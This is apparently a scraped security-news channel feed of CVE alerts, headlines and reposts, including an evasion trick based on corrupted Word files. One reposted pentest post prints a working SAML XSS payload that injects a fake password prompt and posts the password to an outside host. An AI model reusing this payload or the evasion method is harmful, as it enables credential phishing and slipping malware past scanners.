🦑New evasion technique that is bypassing almost all security solutions so far, taking advantage of the recovery functionality in applications. This is groundbreaking as most if not all endpoint solutions aren’t armed with any file recovery techniques and would fail to detect this attack vector.

>> Microsoft has structured word documents similar to archives, constructing any doc file with 3 sections; starting with local file headers, central file headers and end directory records. These 3 sections are linked backward starting from the end to the header.

>> Manipulating any of these sections makes it harder for any endpoint or email security solution to unpack and identify the issue, but recoverable by its intending application after its too late.

Ref: Chadi S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

One UI 70 Beta: A First Look at #Samsung's Latest

https://undercodenews.com/one-ui-70-beta-a-first-look-at-samsungs-latest/

@Undercode_News

Bridging Cultures: A Lakota Educator's Journey in STEM

https://undercodenews.com/bridging-cultures-a-lakota-educators-journey-in-stem/

@Undercode_News

🟠 D-Tale, Remote Code Execution, #CVE-XXXX (Moderate)

https://dailycve.com/d-tale-remote-code-execution-cve-xxxx-moderate/

@DailyCVE

🔴 FHIR/Ucum-#java, XXE Vulnerability, #CVE-XXXX-XXXX (Critical)

https://dailycve.com/fhir-ucum-java-xxe-vulnerability-cve-xxxx-xxxx-critical/

@Daily_CVE

🔴 Browsershot, Local File Inclusion, #CVE-XXXX-XXXX (High)

https://dailycve.com/browsershot-local-file-inclusion-cve-xxxx-xxxx-high/

@Daily_CVE

🔴 phpMyFAQ, Unrestricted File Download (#CVE-TBD) - Critical

https://dailycve.com/phpmyfaq-unrestricted-file-download-cve-tbd-critical/

@Daily_CVE

🔴 Cleo Harmony, VLTrader, LexiCom Unrestricted File Upload and Download (#CVE-XXXX-XXXX) (Critical)

https://dailycve.com/cleo-harmony-vltrader-lexicom-unrestricted-file-upload-and-download-cve-xxxx-xxxx-critical/

@Daily_CVE

🦑How run the Password Reset Flaw | Live PoC - New method

Ref: Rohith S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

⚠️ German Authorities Neutralize BadBox #Malware Affecting 30,000 Devices

https://undercodenews.com/german-authorities-neutralize-badbox-malware-affecting-30000-devices/

@Undercode_News

🚨 Critical Cleo File Transfer #Software Flaw Exploited in #Ransomware Attacks

https://undercodenews.com/critical-cleo-file-transfer-software-flaw-exploited-in-ransomware-attacks/

@Undercode_News

Big Screen, Big Value: #Samsung #Galaxy Tab S9 FE+ Review - Perfect for Family Fun

https://undercodenews.com/big-screen-big-value-samsung-galaxy-tab-s9-fe-review-perfect-for-family-fun/

@Undercode_News

🔐 Stealing the Secret Sauce: How Hackers Can Extract #AI Models

https://undercodenews.com/stealing-the-secret-sauce-how-hackers-can-extract-ai-models/

@Undercode_News

🦑 The Official NASA CSRF Vulnerability Video

🔐 Password Spray Attacks Targeting Citrix Netscaler on the Rise

https://undercodenews.com/password-spray-attacks-targeting-citrix-netscaler-on-the-rise/

@Undercode_News

🦑 Leveling Up Our XSS Proof of Concepts at CybaVerse :

It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).

We recently encountered an XSS vulnerability within a SAML Sign-in flow — not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
🔹 Manipulate the HTML to display a fake login prompt.
🔹 Capture user-entered passwords and send them to our server.

Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the application’s defences, this vulnerability still allowed us to:
🔹 Phish user credentials via a convincing fake prompt.
🔹 Demonstrate impact beyond simple alert pop-ups or redirects.

Here’s a snippet of the payload I crafted:

⚠️ <samlp:StatusCode Value="XSS POC&#39;;document.body.innerHTML=&#39;&lt;br&gt;&lt;h1&gt;Authentication failed, re-enter your password&lt;/h1&gt;&lt;br&gt;&lt;form action=&quot;//https://lnkd.in/ecG5926A&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot;&gt;&lt;br&gt;&lt;button type=&quot;submit&quot;&gt;Submit&lt;/button&gt;&lt;/form&gt;&#39;+document.body.innerHTML;&"/> ⚠️

The image below shows the entered password if someone fell for the prompt: “Authentication failed, re-enter your password.”

Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.

Ref: Michael Jepson
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🚨 Cleo Zero-Day Exploits: A Growing #Ransomware Threat

https://undercodenews.com/cleo-zero-day-exploits-a-growing-ransomware-threat/

@Undercode_News

Versa Strengthens SASE with Integrated Endpoint DLP

https://undercodenews.com/versa-strengthens-sase-with-integrated-endpoint-dlp/

@Undercode_News

🌐 Enhanced Cyber Resilience with Zerto Cloud Vault

https://undercodenews.com/enhanced-cyber-resilience-with-zerto-cloud-vault/

@Undercode_News